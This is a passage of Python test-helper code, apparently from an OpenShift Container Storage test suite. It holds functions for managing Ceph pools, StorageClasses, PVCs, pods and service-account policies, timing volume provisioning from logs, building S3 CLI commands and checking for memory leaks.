for pools in TimeoutSampler(
60, 3, ct_pod.exec_ceph_cmd, 'ceph fs ls'
):
for out in pools:
result = out.get('name')
if result == fs_name:
logger.info("FileSystem %s got created from Ceph Side", fs_name)
ceph_validate = True
break
else:
logger.error("FileSystem %s was not present at Ceph Side", fs_name)
ceph_validate = False
if ceph_validate:
break
except TimeoutExpiredError:
pass
return ceph_validate and ocp_validate
def get_all_storageclass_names():
"""
Function for getting all storageclass
Returns:
list: list of storageclass name
"""
sc_obj = ocp.OCP(
kind=constants.STORAGECLASS,
namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
result = sc_obj.get()
sample = result['items']
storageclass = [
item.get('metadata').get('name') for item in sample if (
(item.get('metadata').get('name') not in constants.IGNORE_SC_GP2)
and (item.get('metadata').get('name') not in constants.IGNORE_SC_FLEX)
)
]
return storageclass
def delete_storageclasses(sc_objs):
""""
Function for Deleting storageclasses
Args:
sc_objs (list): List of SC objects for deletion
Returns:
bool: True if deletion is successful
"""
for sc in sc_objs:
logger.info("Deleting StorageClass with name %s", sc.name)
sc.delete()
return True
def get_cephblockpool_names():
"""
Function for getting all CephBlockPool
Returns:
list: list of cephblockpool name
"""
pool_obj = ocp.OCP(
kind=constants.CEPHBLOCKPOOL,
namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
result = pool_obj.get()
sample = result['items']
pool_list = [
item.get('metadata').get('name') for item in sample
]
return pool_list
def delete_cephblockpools(cbp_objs):
"""
Function for deleting CephBlockPool
Args:
cbp_objs (list): List of CBP objects for deletion
Returns:
bool: True if deletion of CephBlockPool is successful
"""
for cbp in cbp_objs:
logger.info("Deleting CephBlockPool with name %s", cbp.name)
cbp.delete()
return True
def get_cephfs_name():
"""
Function to retrieve the CephFS name
Returns:
str: Name of CFS
"""
cfs_obj = ocp.OCP(
kind=constants.CEPHFILESYSTEM,
namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
result = cfs_obj.get()
return result['items'][0].get('metadata').get('name')
def pull_images(image_name):
"""
Function to pull images on all nodes
Args:
image_name (str): Name of the container image to be pulled
Returns: None
"""
node_objs = node.get_node_objs(get_worker_nodes())
for node_obj in node_objs:
logging.info(f'pulling image "{image_name} " on node {node_obj.name}')
assert node_obj.ocp.exec_oc_debug_cmd(
node_obj.name, cmd_list=[f'podman pull {image_name}']
)
def run_io_with_rados_bench(**kw):
""" A task for radosbench
Runs radosbench command on specified pod . If parameters are
not provided task assumes few default parameters.This task
runs command in synchronous fashion.
Args:
**kw: Needs a dictionary of various radosbench parameters.
ex: pool_name:pool
pg_num:number of pgs for pool
op: type of operation {read, write}
cleanup: True OR False
Returns:
ret: return value of radosbench command
"""
logger.info("Running radosbench task")
ceph_pods = kw.get('ceph_pods') # list of pod objects of ceph cluster
config = kw.get('config')
role = config.get('role', 'client')
clients = [cpod for cpod in ceph_pods if role in cpod.roles]
idx = config.get('idx', 0)
client = clients[idx]
op = config.get('op', 'write')
cleanup = ['--no-cleanup', '--cleanup'][config.get('cleanup', True)]
pool = config.get('pool')
block = str(config.get('size', 4 << 20))
time = config.get('time', 120)
time = str(time)
rados_bench = (
f"rados --no-log-to-stderr "
f"-b {block} "
f"-p {pool} "
f"bench "
f"{time} "
f"{op} "
f"{cleanup} "
)
try:
ret = client.exec_ceph_cmd(ceph_cmd=rados_bench)
except CommandFailed as ex:
logger.error(f"Rados bench failed\n Error is: {ex}")
return False
logger.info(ret)
logger.info("Finished radosbench")
return ret
def get_all_pvs():
"""
Gets all pv in openshift-storage namespace
Returns:
dict: Dict of all pv in openshift-storage namespace
"""
ocp_pv_obj = ocp.OCP(
kind=constants.PV, namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
return ocp_pv_obj.get()
# TODO: revert counts of tries and delay, BZ 1726266
@retry(AssertionError, tries=20, delay=10, backoff=1)
def validate_pv_delete(pv_name):
"""
Validates that a PV is deleted after PVC deletion
Args:
pv_name (str): Name of the PV to validate
Returns:
bool: True if deletion is successful
Raises:
AssertionError: If pv is not deleted
"""
ocp_pv_obj = ocp.OCP(
kind=constants.PV, namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
try:
if ocp_pv_obj.get(resource_name=pv_name):
msg = f"{constants.PV} {pv_name} is not deleted after PVC deletion"
raise AssertionError(msg)
except CommandFailed:
return True
def create_pods(pvc_objs, pod_factory, interface, pods_for_rwx=1, status=""):
"""
Create pods
Args:
pvc_objs (list): List of ocs_ci.ocs.resources.pvc.PVC instances
pod_factory (function): pod_factory function
interface (str): Interface type
pods_for_rwx (int): Number of pods to be created if access mode of
PVC is RWX
status (str): If provided, wait for desired state of each pod before
creating next one
Returns:
list: list of Pod objects
"""
pod_objs = []
for pvc_obj in pvc_objs:
volume_mode = getattr(
pvc_obj, 'volume_mode', pvc_obj.get()['spec']['volumeMode']
)
access_mode = getattr(
pvc_obj, 'access_mode', pvc_obj.get_pvc_access_mode
)
if volume_mode == 'Block':
pod_dict = constants.CSI_RBD_RAW_BLOCK_POD_YAML
raw_block_pv = True
else:
raw_block_pv = False
pod_dict = ''
if access_mode == constants.ACCESS_MODE_RWX:
pod_obj_rwx = [pod_factory(
interface=interface, pvc=pvc_obj, status=status,
pod_dict_path=pod_dict, raw_block_pv=raw_block_pv
) for _ in range(1, pods_for_rwx)]
pod_objs.extend(pod_obj_rwx)
pod_obj = pod_factory(
interface=interface, pvc=pvc_obj, status=status,
pod_dict_path=pod_dict, raw_block_pv=raw_block_pv
)
pod_objs.append(pod_obj)
return pod_objs
def create_build_from_docker_image(
image_name,
install_package,
namespace,
source_image='centos',
source_image_label='latest'
):
"""
Allows to create a build config using a Dockerfile specified as an argument
For eg., oc new-build -D $'FROM centos:7\nRUN yum install -y httpd',
creates a build with 'httpd' installed
Args:
image_name (str): Name of the image to be created
source_image (str): Source image to build docker image from,
Defaults to Centos as base image
namespace (str): project where build config should be created
source_image_label (str): Tag to use along with the image name,
Defaults to 'latest'
install_package (str): package to install over the base image
Returns:
OCP (obj): Returns the OCP object for the image
Fails on UnavailableBuildException exception if build creation
fails
"""
base_image = source_image + ':' + source_image_label
docker_file = (f"FROM {base_image}\n "
f"RUN yum install -y {install_package}\n "
f"CMD tail -f /dev/null")
command = f"new-build -D $\'{docker_file}\' --name={image_name}"
kubeconfig = os.getenv('KUBECONFIG')
oc_cmd = f"oc -n {namespace} "
if kubeconfig:
oc_cmd += f"--kubeconfig {kubeconfig} "
oc_cmd += command
logger.info(f'Running command {oc_cmd}')
result = run(
oc_cmd,
stdout=PIPE,
stderr=PIPE,
timeout=15,
shell=True
)
if result.stderr.decode():
raise UnavailableBuildException(
f'Build creation failed with error: {result.stderr.decode()}'
)
out = result.stdout.decode()
logger.info(out)
if 'Success' in out:
# Build becomes ready once build pod goes into Completed state
pod_obj = OCP(kind='Pod', resource_name=image_name)
if pod_obj.wait_for_resource(
condition='Completed',
resource_name=f'{image_name}' + '-1-build',
timeout=300,
sleep=30
):
logger.info(f'build {image_name} ready')
set_image_lookup(image_name)
logger.info(f'image {image_name} can now be consumed')
image_stream_obj = OCP(
kind='ImageStream', resource_name=image_name
)
return image_stream_obj
else:
raise UnavailableBuildException('Build creation failed')
def set_image_lookup(image_name):
"""
Function to enable lookup, which allows reference to the image stream tag
in the image field of the object. Example,
$ oc set image-lookup mysql
$ oc run mysql --image=mysql
Args:
image_name (str): Name of the image stream to pull
the image locally
Returns:
str: output of set image-lookup command
"""
ocp_obj = ocp.OCP(kind='ImageStream')
command = f'set image-lookup {image_name}'
logger.info(f'image lookup for image"{image_name}" is set')
status = ocp_obj.exec_oc_cmd(command)
return status
def get_worker_nodes():
"""
Fetches all worker nodes.
Returns:
list: List of names of worker nodes
"""
label = 'node-role.kubernetes.io/worker'
ocp_node_obj = ocp.OCP(kind=constants.NODE)
nodes = ocp_node_obj.get(selector=label).get('items')
worker_nodes_list = [node.get('metadata').get('name') for node in nodes]
return worker_nodes_list
def get_master_nodes():
"""
Fetches all master nodes.
Returns:
list: List of names of master nodes
"""
label = 'node-role.kubernetes.io/master'
ocp_node_obj = ocp.OCP(kind=constants.NODE)
nodes = ocp_node_obj.get(selector=label).get('items')
master_nodes_list = [node.get('metadata').get('name') for node in nodes]
return master_nodes_list
def get_start_creation_time(interface, pvc_name):
"""
Get the starting creation time of a PVC based on provisioner logs
Args:
interface (str): The interface backed the PVC
pvc_name (str): Name of the PVC for creation time measurement
Returns:
datetime object: Start time of PVC creation
"""
format = '%H:%M:%S.%f'
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], 'csi-provisioner')
logs += pod.get_pod_logs(pod_name[1], 'csi-provisioner')
logs = logs.split("\n")
# Extract the starting time for the PVC provisioning
start = [
i for i in logs if re.search(f"provision.*{pvc_name}.*started", i)
]
start = start[0].split(' ')[1]
return datetime.datetime.strptime(start, format)
def get_end_creation_time(interface, pvc_name):
"""
Get the ending creation time of a PVC based on provisioner logs
Args:
interface (str): The interface backed the PVC
pvc_name (str): Name of the PVC for creation time measurement
Returns:
datetime object: End time of PVC creation
"""
format = '%H:%M:%S.%f'
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], 'csi-provisioner')
logs += pod.get_pod_logs(pod_name[1], 'csi-provisioner')
logs = logs.split("\n")
# Extract the ending time for the PVC provisioning
end = [
i for i in logs if re.search(f"provision.*{pvc_name}.*succeeded", i)
]
end = end[0].split(' ')[1]
return datetime.datetime.strptime(end, format)
def measure_pvc_creation_time(interface, pvc_name):
"""
Measure PVC creation time based on logs
Args:
interface (str): The interface backed the PVC
pvc_name (str): Name of the PVC for creation time measurement
Returns:
float: Creation time for the PVC
"""
start = get_start_creation_time(interface=interface, pvc_name=pvc_name)
end = get_end_creation_time(interface=interface, pvc_name=pvc_name)
total = end - start
return total.total_seconds()
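# Sketch of the provisioner log lines the creation-time helpers above match
# (the exact format is an assumption; only the 'provision ... started' /
# '... succeeded' markers and the timestamp in the second whitespace-separated
# field are relied upon):
#   I0101 10:00:00.000000 ... provision "pvc-test" ... started
#   I0101 10:00:03.500000 ... provision "pvc-test" ... succeeded
# which would yield a creation time of 3.5 seconds.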
def measure_pvc_creation_time_bulk(interface, pvc_name_list):
"""
Measure PVC creation time of bulk PVC based on logs.
Args:
interface (str): The interface backed the PVC
pvc_name_list (list): List of PVC Names for measuring creation time
Returns:
pvc_dict (dict): Dictionary of pvc_name with creation time.
"""
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], 'csi-provisioner')
logs += pod.get_pod_logs(pod_name[1], 'csi-provisioner')
logs = logs.split("\n")
pvc_dict = dict()
format = '%H:%M:%S.%f'
for pvc_name in pvc_name_list:
# Extract the starting time for the PVC provisioning
start = [
i for i in logs if re.search(f"provision.*{pvc_name}.*started", i)
]
start = start[0].split(' ')[1]
start_time = datetime.datetime.strptime(start, format)
# Extract the end time for the PVC provisioning
end = [
i for i in logs if re.search(f"provision.*{pvc_name}.*succeeded", i)
]
end = end[0].split(' ')[1]
end_time = datetime.datetime.strptime(end, format)
total = end_time - start_time
pvc_dict[pvc_name] = total.total_seconds()
return pvc_dict
def measure_pv_deletion_time_bulk(interface, pv_name_list):
"""
Measure PV deletion time of bulk PV, based on logs.
Args:
interface (str): The interface backed the PV
pv_name_list (list): List of PV Names for measuring deletion time
Returns:
pv_dict (dict): Dictionary of pv_name with deletion time.
"""
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], 'csi-provisioner')
logs += pod.get_pod_logs(pod_name[1], 'csi-provisioner')
logs = logs.split("\n")
pv_dict = dict()
format = '%H:%M:%S.%f'
for pv_name in pv_name_list:
# Extract the deletion start time for the PV
start = [
i for i in logs if re.search(f"delete \"{pv_name}\": started", i)
]
start = start[0].split(' ')[1]
start_time = datetime.datetime.strptime(start, format)
# Extract the deletion end time for the PV
end = [
i for i in logs if re.search(f"delete \"{pv_name}\": succeeded", i)
]
end = end[0].split(' ')[1]
end_time = datetime.datetime.strptime(end, format)
total = end_time - start_time
pv_dict[pv_name] = total.total_seconds()
return pv_dict
def get_start_deletion_time(interface, pv_name):
"""
Get the start time of PV deletion based on provisioner logs
Args:
interface (str): The interface backed the PV
pv_name (str): Name of the PV for deletion time measurement
Returns:
datetime object: Start time of PV deletion
"""
format = '%H:%M:%S.%f'
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], 'csi-provisioner')
logs += pod.get_pod_logs(pod_name[1], 'csi-provisioner')
logs = logs.split("\n")
# Extract the starting time for the PVC deletion
start = [
i for i in logs if re.search(f"delete \"{pv_name}\": started", i)
]
start = start[0].split(' ')[1]
return datetime.datetime.strptime(start, format)
def get_end_deletion_time(interface, pv_name):
"""
Get the end time of PV deletion based on provisioner logs
Args:
interface (str): The interface backed the PV
pv_name (str): Name of the PV for deletion time measurement
Returns:
datetime object: End time of PV deletion
"""
format = '%H:%M:%S.%f'
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], 'csi-provisioner')
logs += pod.get_pod_logs(pod_name[1], 'csi-provisioner')
logs = logs.split("\n")
# Extract the ending time for the PV deletion
end = [
i for i in logs if re.search(f"delete \"{pv_name}\": succeeded", i)
]
end = end[0].split(' ')[1]
return datetime.datetime.strptime(end, format)
def measure_pvc_deletion_time(interface, pv_name):
"""
Measure PVC deletion time based on logs
Args:
interface (str): The interface backed the PVC
pv_name (str): Name of the PV for deletion time measurement
Returns:
float: Deletion time for the PVC
"""
start = get_start_deletion_time(interface=interface, pv_name=pv_name)
end = get_end_deletion_time(interface=interface, pv_name=pv_name)
total = end - start
return total.total_seconds()
def pod_start_time(pod_obj):
"""
Function to measure time taken for container(s) to get into running state
by measuring the difference between container's start time (when container
went into running state) and started time (when container was actually
started)
Args:
pod_obj(obj): pod object to measure start time
Returns:
containers_start_time(dict):
Returns the name and start time of container(s) in a pod
"""
time_format = '%Y-%m-%dT%H:%M:%SZ'
containers_start_time = {}
start_time = pod_obj.data['status']['startTime']
start_time = datetime.datetime.strptime(start_time, time_format)
for container in range(len(pod_obj.data['status']['containerStatuses'])):
started_time = pod_obj.data[
'status']['containerStatuses'][container]['state'][
'running']['startedAt']
started_time = datetime.datetime.strptime(started_time, time_format)
container_name = pod_obj.data[
'status']['containerStatuses'][container]['name']
container_start_time = (started_time - start_time).seconds
containers_start_time[container_name] = container_start_time
return containers_start_time
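# Illustrative return value (hypothetical container names):
#   {'web-server': 4, 'log-sidecar': 6}
# i.e. seconds between the pod's startTime and each container's
# running.startedAt timestamp.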
def get_default_storage_class():
"""
Get the default StorageClass(es)
Returns:
list: default StorageClass(es) list
"""
default_sc_obj = ocp.OCP(kind='StorageClass')
storage_classes = default_sc_obj.get().get('items')
storage_classes = [
sc for sc in storage_classes if 'annotations' in sc.get('metadata')
]
return [
sc.get('metadata').get('name') for sc in storage_classes if sc.get(
'metadata'
).get('annotations').get(
'storageclass.kubernetes.io/is-default-class'
) == 'true'
]
def change_default_storageclass(scname):
"""
Change the default StorageClass to the given SC name
Args:
scname (str): StorageClass name
Returns:
bool: True on success
"""
default_sc = get_default_storage_class()
ocp_obj = ocp.OCP(kind='StorageClass')
if default_sc:
# Change the existing default Storageclass annotation to false
patch = " '{\"metadata\": {\"annotations\":" \
"{\"storageclass.kubernetes.io/is-default-class\"" \
":\"false\"}}}' "
patch_cmd = f"patch storageclass {default_sc} -p" + patch
ocp_obj.exec_oc_cmd(command=patch_cmd)
# Change the new storageclass to default
patch = " '{\"metadata\": {\"annotations\":" \
"{\"storageclass.kubernetes.io/is-default-class\"" \
":\"true\"}}}' "
patch_cmd = f"patch storageclass {scname} -p" + patch
ocp_obj.exec_oc_cmd(command=patch_cmd)
return True
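# The patch commands above expand to something like (illustrative, with a
# hypothetical StorageClass name):
#   oc patch storageclass my-sc -p '{"metadata": {"annotations":
#   {"storageclass.kubernetes.io/is-default-class": "true"}}}'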
def verify_volume_deleted_in_backend(interface, image_uuid, pool_name=None):
"""
Verify that Image/Subvolume is not present in the backend.
Args:
interface (str): The interface backed the PVC
image_uuid (str): Part of VolID which represents
corresponding image/subvolume in backend
eg: oc get pv/<volumeName> -o jsonpath='{.spec.csi.volumeHandle}'
Output is the CSI generated VolID and looks like:
'0001-000c-rook-cluster-0000000000000001-
f301898c-a192-11e9-852a-1eeeb6975c91' where
image_uuid is 'f301898c-a192-11e9-852a-1eeeb6975c91'
pool_name (str): Name of the rbd-pool if interface is CephBlockPool
Returns:
bool: True if volume is not present. False if volume is present
"""
ct_pod = pod.get_ceph_tools_pod()
if interface == constants.CEPHBLOCKPOOL:
valid_error = f"error opening image csi-vol-{image_uuid}"
cmd = f"rbd info -p {pool_name} csi-vol-{image_uuid}"
if interface == constants.CEPHFILESYSTEM:
valid_error = f"Subvolume 'csi-vol-{image_uuid}' not found"
cmd = (
f"ceph fs subvolume getpath {defaults.CEPHFILESYSTEM_NAME}"
f" csi-vol-{image_uuid} csi"
)
try:
ct_pod.exec_ceph_cmd(ceph_cmd=cmd, format='json')
return False
except CommandFailed as ecf:
assert valid_error in str(ecf), (
f"Error occurred while verifying volume is deleted in backend: "
f"{str(ecf)} ImageUUID: {image_uuid}. Interface type: {interface}"
)
logger.info(
f"Verified: Volume corresponding to uuid {image_uuid} is deleted "
f"in backend"
)
return True
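# Illustrative VolumeHandle parsing (taken from the docstring above): for
#   0001-000c-rook-cluster-0000000000000001-f301898c-a192-11e9-852a-1eeeb6975c91
# the image_uuid is 'f301898c-a192-11e9-852a-1eeeb6975c91' and the backend
# object checked is 'csi-vol-f301898c-a192-11e9-852a-1eeeb6975c91'.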
def create_serviceaccount(namespace):
"""
Create a Serviceaccount
Args:
namespace (str): The namespace for the serviceaccount creation
Returns:
OCS: An OCS instance for the service_account
"""
service_account_data = templating.load_yaml(
constants.SERVICE_ACCOUNT_YAML
)
service_account_data['metadata']['name'] = create_unique_resource_name(
'sa', 'serviceaccount'
)
service_account_data['metadata']['namespace'] = namespace
return create_resource(**service_account_data)
def get_serviceaccount_obj(sa_name, namespace):
"""
Get serviceaccount obj
Args:
sa_name (str): Service Account name
namespace (str): The namespace for the serviceaccount creation
Returns:
OCS: An OCS instance for the service_account
"""
ocp_sa_obj = ocp.OCP(kind=constants.SERVICE_ACCOUNT, namespace=namespace)
try:
sa_dict = ocp_sa_obj.get(resource_name=sa_name)
return OCS(**sa_dict)
except CommandFailed:
logger.error("ServiceAccount not found in specified namespace")
def validate_scc_policy(sa_name, namespace):
"""
Validate serviceaccount is added to scc of privileged
Args:
sa_name (str): Service Account name
namespace (str): The namespace for the serviceaccount creation
Returns:
bool: True if sc_name is present in scc of privileged else False
"""
sa_name = f"system:serviceaccount:{namespace}:{sa_name}"
logger.info(sa_name)
ocp_scc_obj = ocp.OCP(kind=constants.SCC, namespace=namespace)
scc_dict = ocp_scc_obj.get(resource_name=constants.PRIVILEGED)
scc_users_list = scc_dict.get('users')
for scc_user in scc_users_list:
if scc_user == sa_name:
return True
return False
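# Example (hypothetical names): validate_scc_policy('my-sa', 'openshift-storage')
# checks whether 'system:serviceaccount:openshift-storage:my-sa' appears in the
# users list of the privileged SCC.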
def add_scc_policy(sa_name, namespace):
"""
Adding ServiceAccount to scc privileged
Args:
sa_name (str): ServiceAccount name
namespace (str): The namespace for the scc_policy creation
"""
ocp = OCP()
out = ocp.exec_oc_cmd(
command=f"adm policy add-scc-to-user privileged system:serviceaccount:{namespace}:{sa_name}",
out_yaml_format=False
)
logger.info(out)
def remove_scc_policy(sa_name, namespace):
"""
Removing ServiceAccount from scc privileged
Args:
sa_name (str): ServiceAccount name
namespace (str): The namespace for the scc_policy deletion
"""
ocp = OCP()
out = ocp.exec_oc_cmd(
command=f"adm policy remove-scc-from-user privileged system:serviceaccount:{namespace}:{sa_name}",
out_yaml_format=False
)
logger.info(out)
def delete_deploymentconfig_pods(pod_obj):
"""
Delete deploymentconfig pod
Args:
pod_obj (object): Pod object
"""
dc_ocp_obj = ocp.OCP(kind=constants.DEPLOYMENTCONFIG, namespace=pod_obj.namespace)
pod_data_list = dc_ocp_obj.get()['items']
if pod_data_list:
for pod_data in pod_data_list:
if pod_obj.get_labels().get('name') == pod_data.get('metadata').get('name'):
dc_ocp_obj.delete(resource_name=pod_obj.get_labels().get('name'))
dc_ocp_obj.wait_for_delete(resource_name=pod_obj.get_labels().get('name'))
def craft_s3_command(mcg_obj, cmd):
"""
Crafts the AWS CLI S3 command including the
login credentials and the command to be run
Args:
mcg_obj: An MCG object containing the MCG S3 connection credentials
cmd: The AWSCLI command to run
Returns:
str: The crafted command, ready to be executed on the pod
"""
if mcg_obj:
base_command = (
f"sh -c \"AWS_ACCESS_KEY_ID={mcg_obj.access_key_id} "
f"AWS_SECRET_ACCESS_KEY={mcg_obj.access_key} "
f"AWS_DEFAULT_REGION={mcg_obj.region} "
f"aws s3 "
f"--endpoint={mcg_obj.s3_endpoint} "
f"--no-verify-ssl "
)
string_wrapper = "\""
else:
base_command = (
f"aws s3 --no-verify-ssl --no-sign-request "
)
string_wrapper = ''
return f"{base_command}{cmd}{string_wrapper}"
def craft_s3_api_command(mcg_obj, cmd):
"""
Crafts the AWS cli S3 API level commands
Args:
mcg_obj: An MCG object containing the MCG S3 connection credentials
cmd: The AWSCLI API command to run
Returns:
str: The crafted command, ready to be executed on the pod
"""
if mcg_obj:
base_command = (
f"sh -c \"AWS_ACCESS_KEY_ID={mcg_obj.access_key_id} "
f"AWS_SECRET_ACCESS_KEY={mcg_obj.access_key} "
f"AWS_DEFAULT_REGION={mcg_obj.region} "
f"aws s3api "
f"--endpoint={mcg_obj.s3_endpoint} "
f"--no-verify-ssl "
)
string_wrapper = "\""
else:
base_command = (
f"aws s3api --no-verify-ssl --no-sign-request "
)
string_wrapper = ''
return f"{base_command}{cmd}{string_wrapper}"
def wait_for_resource_count_change(
func_to_use, previous_num, namespace, change_type='increase',
min_difference=1, timeout=20, interval=2, **func_kwargs
):
"""
Wait for a change in total count of PVC or pod
Args:
func_to_use (function): Function to be used to fetch resource info
Supported functions: pod.get_all_pvcs(), pod.get_all_pods()
previous_num (int): Previous number of pods/PVCs for comparison
namespace (str): Name of the namespace
change_type (str): Type of change to check. Accepted values are
'increase' and 'decrease'. Default is 'increase'.
min_difference (int): Minimum required difference in PVC/pod count
timeout (int): Maximum wait time in seconds
interval (int): Time in seconds to wait between consecutive checks
Returns:
True if difference in count is greater than or equal to
'min_difference'. False in case of timeout.
"""
try:
for sample in TimeoutSampler(
timeout, interval, func_to_use, namespace, **func_kwargs
):
if func_to_use == pod.get_all_pods:
current_num = len(sample)
else:
current_num = len(sample['items'])
if change_type == 'increase':
count_diff = current_num - previous_num
else:
count_diff = previous_num - current_num
if count_diff >= min_difference:
return True
except TimeoutExpiredError:
return False
def verify_pv_mounted_on_node(node_pv_dict):
"""
Check if mount point of a PV exists on a node
Args:
node_pv_dict (dict): Node to PV list mapping
eg: {'node1': ['pv1', 'pv2', 'pv3'], 'node2': ['pv4', 'pv5']}
Returns:
dict: Node to existing PV list mapping
eg: {'node1': ['pv1', 'pv3'], 'node2': ['pv5']}
"""
existing_pvs = {}
for node_name, pvs in node_pv_dict.items():
cmd = f'oc debug nodes/{node_name} -- df'
df_on_node = run_cmd(cmd)
existing_pvs[node_name] = []
for pv_name in pvs:
if f"/pv/{pv_name}/" in df_on_node:
existing_pvs[node_name].append(pv_name)
return existing_pvs
def converge_lists(list_to_converge):
"""
Function to flatten the sublists created when collecting future objects
Args:
list_to_converge (list): arg list of lists, eg: [[1,2],[3,4]]
Returns:
list (list): return converged list eg: [1,2,3,4]
"""
return [item for sublist in list_to_converge for item in sublist]
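# Quick check of the flattening behaviour documented above:
#   converge_lists([[1, 2], [3, 4]]) -> [1, 2, 3, 4]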
def create_multiple_pvc_parallel(
sc_obj, namespace, number_of_pvc, size, access_modes
):
"""
Function to create multiple PVCs in parallel using threads
Function will create PVCs based on the available access modes
Args:
sc_obj (str): Storage Class object
namespace (str): The namespace for creating pvc
number_of_pvc (int): Number of PVCs to be created
size (str): size of the pvc eg: '10Gi'
access_modes (list): List of access modes for PVC creation
Returns:
pvc_objs_list (list): List of pvc objs created in function
"""
obj_status_list, result_lists = ([] for i in range(2))
with ThreadPoolExecutor() as executor:
for mode in access_modes:
result_lists.append(
executor.submit(
create_multiple_pvcs, sc_name=sc_obj.name,
namespace=namespace, number_of_pvc=number_of_pvc,
access_mode=mode, size=size)
)
result_list = [result.result() for result in result_lists]
pvc_objs_list = converge_lists(result_list)
# Check that all the PVCs are in Bound state
with ThreadPoolExecutor() as executor:
for objs in pvc_objs_list:
obj_status_list.append(
executor.submit(wait_for_resource_state, objs, 'Bound')
)
if False in [obj.result() for obj in obj_status_list]:
raise TimeoutExpiredError
return pvc_objs_list
def create_pods_parallel(
pvc_list, namespace, interface, pod_dict_path=None, sa_name=None, raw_block_pv=False,
dc_deployment=False, node_selector=None
):
"""
Function to create pods in parallel
Args:
pvc_list (list): List of pvcs to be attached in pods
namespace (str): The namespace for creating pod
interface (str): The interface backed the PVC
pod_dict_path (str): pod_dict_path for yaml
sa_name (str): sa_name for providing permission
raw_block_pv (bool): Either RAW block or not
dc_deployment (bool): Either DC deployment or not
node_selector (dict): dict of key-value pair to be used for nodeSelector field
eg: {'nodetype': 'app-pod'}
Returns:
pod_objs (list): Returns list of pods created
"""
future_pod_objs = []
# Use a 300 sec wait time since in scale tests, once the setup has more
# PODs, the time taken for a pod to come up depends on available resources
wait_time = 300
if raw_block_pv and not pod_dict_path:
pod_dict_path = constants.CSI_RBD_RAW_BLOCK_POD_YAML
with ThreadPoolExecutor() as executor:
for pvc_obj in pvc_list:
future_pod_objs.append(executor.submit(
create_pod, interface_type=interface,
pvc_name=pvc_obj.name, do_reload=False, namespace=namespace,
raw_block_pv=raw_block_pv, pod_dict_path=pod_dict_path,
sa_name=sa_name, dc_deployment=dc_deployment, node_selector=node_selector
))
pod_objs = [pvc_obj.result() for pvc_obj in future_pod_objs]
# Check that all the pods are in Running state
# The creation above does not wait for the pods to come up because of the thread usage
with ThreadPoolExecutor() as executor:
for obj in pod_objs:
future_pod_objs.append(
executor.submit(wait_for_resource_state, obj, 'Running', timeout=wait_time)
)
# If pods not up raise exception/failure
if False in [obj.result() for obj in future_pod_objs]:
raise TimeoutExpiredError
return pod_objs
def delete_objs_parallel(obj_list):
"""
Function to delete objs specified in list
Args:
obj_list(list): List can be obj of pod, pvc, etc
Returns:
bool: True if obj deleted else False
"""
threads = list()
for obj in obj_list:
process = threading.Thread(target=obj.delete)
process.start()
threads.append(process)
for process in threads:
process.join()
return True
def memory_leak_analysis(median_dict):
"""
Function to analyse Memory leak after execution of test case
Memory leak is analyzed based on the top output "RES" value of the
ceph-osd daemon, i.e. fields[7] in the code
Args:
median_dict (dict): dict of worker nodes and respective median value
eg: median_dict = {'worker_node_1':102400, 'worker_node_2':204800, ...}
More Detail on Median value:
Calculating a memory leak requires a constant baseline value, which
should not be the start or end of the test, so it is derived by sampling
memory for 180 sec before TC execution and taking the median.
Memory values can differ between nodes, so a constant value is
identified for each node and stored in median_dict
Usage:
test_case(.., memory_leak_function):
.....
median_dict = helpers.get_memory_leak_median_value()
.....
TC execution part, memory_leak_fun will capture data
....
helpers.memory_leak_analysis(median_dict)
....
"""
# dict to store memory leak difference for each worker
diff = {}
for worker in get_worker_nodes():
memory_leak_data = []
if os.path.exists(f"/tmp/{worker}-top-output.txt"):
with open(f"/tmp/{worker}-top-output.txt", "r") as f:
data = f.readline()
list = data.split(" ")
list = [i for i in list if i]
memory_leak_data.append(list[7])
else:
logging.info(f"worker {worker} memory leak file not found")
raise UnexpectedBehaviour
# Get the start value from the median_dict arg for the respective worker
start_value = median_dict[f"{worker}"]
end_value = memory_leak_data[-1]
logging.info(f"Median value {start_value}")
logging.info(f"End value {end_value}")
# Convert the values to kb for calculations
if 'g' in start_value:
start_value = float(1024 ** 2 * float(start_value[:-1]))
elif 'm' in start_value:
start_value = float(1024 * float(start_value[:-1]))
else:
start_value = float(start_value)
if 'g' in end_value:
end_value = float(1024 ** 2 * float(end_value[:-1]))
elif 'm' in end_value:
end_value = float(1024 * float(end_value[:-1]))
else:
end_value = float(end_value)
# Calculate the percentage of diff between start and end value
# Based on value decide TC pass or fail
diff[worker] = ((end_value - start_value) / start_value) * 100
logging.info(f"Percentage diff in start and end value {diff[worker]}")
if diff[worker] <= 20:
logging.info(f"No memory leak in worker {worker} passing the test")
else:
logging.info(f"There is a memory leak in worker {worker}")
logging.info(f"Memory median value start of the test {start_value}")
logging.info(f"Memory value end of the test {end_value}")
raise UnexpectedBehaviour
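# Worked example of the 20% threshold above (illustrative numbers): a start
# value of 102400 kb and an end value of 112640 kb give
# ((112640 - 102400) / 102400) * 100 = 10.0%, which is within the 20% limit,
# so no leak is reported for that worker.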
def get_memory_leak_median_value():
"""
Function to calculate memory leak Median value by collecting the data for 180 sec
and find the median value which will be considered as starting point
to evaluate memory leak using "RES" value of ceph-osd daemon i.e. list[7] in code
Returns:
median_dict (dict): dict of worker nodes and respective median value
"""
median_dict = {}
timeout = 180 # wait for 180 sec to evaluate memory leak median data.
logger.info(f"waiting for {timeout} sec to evaluate the median value")
time.sleep(timeout)
for worker in get_worker_nodes():
memory_leak_data = []
